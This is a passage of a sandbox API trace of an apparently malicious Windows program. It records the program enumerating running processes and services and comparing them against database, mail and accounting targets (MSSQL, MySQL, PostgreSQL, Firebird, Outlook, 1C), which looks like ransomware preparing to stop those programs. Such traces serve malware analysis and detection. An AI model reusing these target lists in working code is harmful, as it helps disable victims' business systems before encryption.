th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0245.993] lstrlenW (lpString="reader_sl.exe") returned 13 [0245.993] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0245.993] lstrlenW (lpString="cmd.exe") returned 7 [0245.993] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0245.994] lstrlenW (lpString="conhost.exe") returned 11 [0245.994] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0245.994] lstrlenW (lpString="dllhost.exe") returned 11 [0245.994] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0245.994] lstrlenW (lpString="mode.com") returned 8 [0245.994] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0245.994] CloseHandle (hObject=0x2e8) returned 1 [0245.994] Sleep (dwMilliseconds=0x1f4) [0246.601] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea0b0 [0246.611] EnumServicesStatusExW (in: hSCManager=0x47ea0b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0246.611] GetLastError () returned 0xea [0246.611] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc9a) returned 0x3dee5b0 [0246.612] EnumServicesStatusExW (in: hSCManager=0x47ea0b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dee5b0, cbBufSize=0xc9a, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dee5b0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0246.612] CloseServiceHandle (hSCObject=0x47ea0b0) returned 1 [0246.612] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0246.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0246.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0246.612] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0246.612] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0246.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0246.612] lstrlenW (lpString="AudioSrv") returned 8 [0246.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0246.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0246.612] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0246.612] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0246.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0246.612] lstrlenW (lpString="BFE") returned 3 [0246.612] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0246.612] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0246.612] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0246.612] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0246.612] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0246.612] lstrlenW (lpString="CryptSvc") returned 8 [0246.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0246.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0246.613] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0246.613] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0246.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0246.613] lstrlenW (lpString="CscService") returned 10 [0246.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0246.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0246.613] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0246.613] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0246.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0246.613] lstrlenW (lpString="DcomLaunch") returned 10 [0246.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0246.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0246.613] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0246.613] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0246.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0246.613] lstrlenW (lpString="Dhcp") returned 4 [0246.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0246.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0246.613] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0246.613] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0246.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0246.613] lstrlenW (lpString="Dnscache") returned 8 [0246.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0246.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0246.613] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0246.613] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0246.613] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0246.613] lstrlenW (lpString="DPS") returned 3 [0246.613] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0246.613] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0246.614] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0246.614] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0246.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0246.614] lstrlenW (lpString="eventlog") returned 8 [0246.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0246.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0246.614] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0246.614] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0246.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0246.614] lstrlenW (lpString="EventSystem") returned 11 [0246.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0246.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0246.614] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0246.614] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0246.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0246.614] lstrlenW (lpString="gpsvc") returned 5 [0246.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0246.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0246.614] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0246.614] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0246.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0246.614] lstrlenW (lpString="LanmanWorkstation") returned 17 [0246.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0246.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0246.614] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0246.614] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0246.614] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0246.614] lstrlenW (lpString="lmhosts") returned 7 [0246.614] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0246.614] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0246.614] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0246.615] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0246.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0246.615] lstrlenW (lpString="MMCSS") returned 5 [0246.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0246.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0246.615] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0246.615] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0246.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0246.615] lstrlenW (lpString="MpsSvc") returned 6 [0246.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0246.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0246.615] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0246.615] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0246.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0246.615] lstrlenW (lpString="NlaSvc") returned 6 [0246.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0246.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0246.615] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0246.615] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0246.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0246.615] lstrlenW (lpString="nsi") returned 3 [0246.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0246.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0246.615] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0246.615] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0246.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0246.615] lstrlenW (lpString="PcaSvc") returned 6 [0246.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0246.615] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0246.615] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0246.615] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0246.615] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0246.616] lstrlenW (lpString="PlugPlay") returned 8 [0246.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0246.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0246.616] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0246.616] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0246.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0246.616] lstrlenW (lpString="Power") returned 5 [0246.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0246.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0246.616] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0246.616] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0246.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0246.616] lstrlenW (lpString="ProfSvc") returned 7 [0246.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0246.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0246.616] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0246.616] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0246.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0246.616] lstrlenW (lpString="RpcEptMapper") returned 12 [0246.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0246.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0246.616] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0246.616] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0246.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0246.616] lstrlenW (lpString="RpcSs") returned 5 [0246.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0246.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0246.616] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0246.616] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0246.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0246.616] lstrlenW (lpString="SamSs") returned 5 [0246.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0246.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0246.617] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0246.617] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0246.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0246.617] lstrlenW (lpString="Schedule") returned 8 [0246.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0246.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0246.617] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0246.617] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0246.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0246.617] lstrlenW (lpString="SENS") returned 4 [0246.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0246.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0246.617] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0246.617] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0246.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0246.617] lstrlenW (lpString="ShellHWDetection") returned 16 [0246.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0246.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0246.617] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0246.617] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0246.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0246.617] lstrlenW (lpString="Spooler") returned 7 [0246.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0246.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0246.617] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0246.617] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0246.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0246.617] lstrlenW (lpString="Themes") returned 6 [0246.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0246.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0246.617] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0246.618] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0246.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0246.618] lstrlenW (lpString="UxSms") returned 5 [0246.618] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0246.618] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0246.618] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0246.618] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0246.618] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0246.618] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dee5b0 | out: hHeap=0xb00000) returned 1 [0246.618] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e8 [0246.619] Process32FirstW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0246.619] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0246.620] lstrlenW (lpString="System") returned 6 [0246.620] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0246.620] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0246.620] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0246.620] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0246.620] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0246.620] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0246.620] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0246.620] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0246.620] lstrlenW (lpString="smss.exe") returned 8 [0246.620] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0246.620] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0246.620] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0246.620] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0246.620] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0246.620] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0246.620] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0246.620] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.621] lstrlenW (lpString="csrss.exe") returned 9 [0246.621] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0246.621] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0246.621] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0246.621] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0246.621] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0246.621] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0246.621] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0246.621] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0246.621] lstrlenW (lpString="wininit.exe") returned 11 [0246.621] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0246.621] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0246.621] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0246.621] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0246.621] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0246.621] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0246.621] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0246.621] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0246.622] lstrlenW (lpString="csrss.exe") returned 9 [0246.622] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0246.622] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0246.622] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0246.622] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0246.622] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0246.622] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0246.622] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0246.622] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0246.622] lstrlenW (lpString="winlogon.exe") returned 12 [0246.622] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0246.622] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0246.622] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0246.622] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0246.622] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0246.622] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0246.622] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0246.622] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0246.623] lstrlenW (lpString="services.exe") returned 12 [0246.623] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0246.623] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0246.623] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0246.623] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0246.623] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0246.623] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0246.623] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0246.623] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0246.623] lstrlenW (lpString="lsass.exe") returned 9 [0246.623] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0246.623] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0246.623] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0246.623] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0246.623] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0246.623] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0246.623] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0246.623] Process32NextW (in: hSnapshot=0x2e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0246.623] lstrlenW (lpString="lsm.exe") returned 7 [0246.624] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0246.624] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0246.624] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0246.624] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0246.624] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0246.624] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0246.624] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 